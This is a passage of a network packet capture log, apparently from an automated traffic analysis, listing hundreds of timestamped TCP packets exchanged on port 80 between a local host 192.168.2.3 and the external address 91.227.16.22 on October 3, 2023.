                                                                                                        Oct 3, 2023 18:02:38.878810883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878922939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.878988028 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879024029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879087925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879152060 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879165888 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879277945 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879343033 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879373074 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879441023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879503965 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879540920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879621983 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879686117 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879724026 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879786968 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.879848957 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.879923105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880000114 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880063057 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.880096912 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880184889 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880249977 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.880276918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880361080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880424976 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.880496025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880584002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880649090 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.880666971 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880728960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880794048 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.880841970 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880929947 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.880995989 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.881021023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.881083012 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.881149054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:38.881211042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:38.929858923 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.092719078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.092745066 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.092932940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093024015 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093038082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093091011 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093149900 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093246937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093305111 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093364954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093446016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093489885 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093543053 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093637943 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093681097 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093719959 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093832970 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.093885899 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.093933105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094017029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094065905 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.094104052 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094191074 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094233036 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.094325066 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094427109 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094472885 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.094511986 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094862938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.094918013 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095004082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095016956 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095068932 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095079899 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095172882 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095213890 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095216036 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095305920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095350981 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095451117 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095626116 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095678091 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095729113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095817089 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.095870018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.095902920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096028090 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096039057 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096074104 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096122026 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096169949 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096185923 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096342087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096426010 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096455097 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096493006 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096577883 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096611977 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096631050 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096713066 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096715927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096779108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096844912 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096858978 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096879005 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.096924067 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.096960068 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097016096 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097060919 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.097094059 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097153902 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097196102 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.097512960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097579956 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097629070 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.097666025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097762108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097809076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.097845078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097944021 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.097992897 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.098022938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098100901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098151922 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.098198891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098283052 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098329067 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.098396063 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098503113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098553896 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.098593950 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098706007 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098752975 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.098792076 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098911047 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098939896 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.098959923 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099047899 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099096060 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099250078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099261045 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099306107 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099308014 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099406004 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099447966 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099452972 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099503994 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099540949 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099545956 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099618912 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099659920 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099697113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099792957 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099834919 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.099869013 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099951029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.099998951 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100045919 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100120068 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100163937 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100198984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100279093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100323915 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100361109 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100457907 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100505114 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100536108 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100598097 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100645065 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100672960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100714922 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100755930 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.100792885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100888968 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.100931883 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101016998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101054907 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101124048 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101157904 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101188898 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101232052 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101244926 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101306915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101346016 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101358891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101407051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101447105 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101454020 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101530075 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101572037 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101587057 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101648092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101692915 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101697922 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101761103 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101804018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.101855040 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101932049 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.101975918 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102045059 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102092981 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102133036 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102150917 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102199078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102247000 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102277994 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102364063 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102406979 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102448940 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102495909 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102536917 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102555037 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102605104 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102647066 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102690935 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102761984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102802992 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102828979 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102870941 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.102911949 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.102921963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103024006 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103076935 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103111982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103178024 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103219032 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103255987 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103307009 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103347063 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103374004 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103485107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103503942 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103524923 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103581905 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103624105 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103648901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103707075 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103744984 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103858948 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103872061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103905916 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.103907108 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.103970051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104007959 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.104048967 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104103088 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104151964 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.104192972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104367971 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104409933 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.104454041 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104548931 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104593039 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.104648113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104794025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104830980 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.104893923 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104960918 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.104998112 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105050087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105303049 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105341911 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105386972 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105444908 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105488062 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105529070 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105602980 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105640888 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105669975 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105727911 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105767012 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105768919 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105884075 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.105921984 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.105931997 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106055021 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106091022 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106117010 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106192112 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106229067 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106257915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106316090 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106352091 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106383085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106426001 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106462955 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106462955 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106523037 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106559038 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106571913 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106622934 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106662989 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106682062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106731892 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106769085 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106787920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106836081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106873035 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.106915951 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.106957912 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107001066 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107043982 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107178926 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107196093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107209921 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107217073 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107249022 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107261896 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107358932 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107397079 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107436895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107531071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107569933 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107611895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107672930 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107709885 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.107753038 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.107850075 CEST804982891.227.16.22192.168.2.3
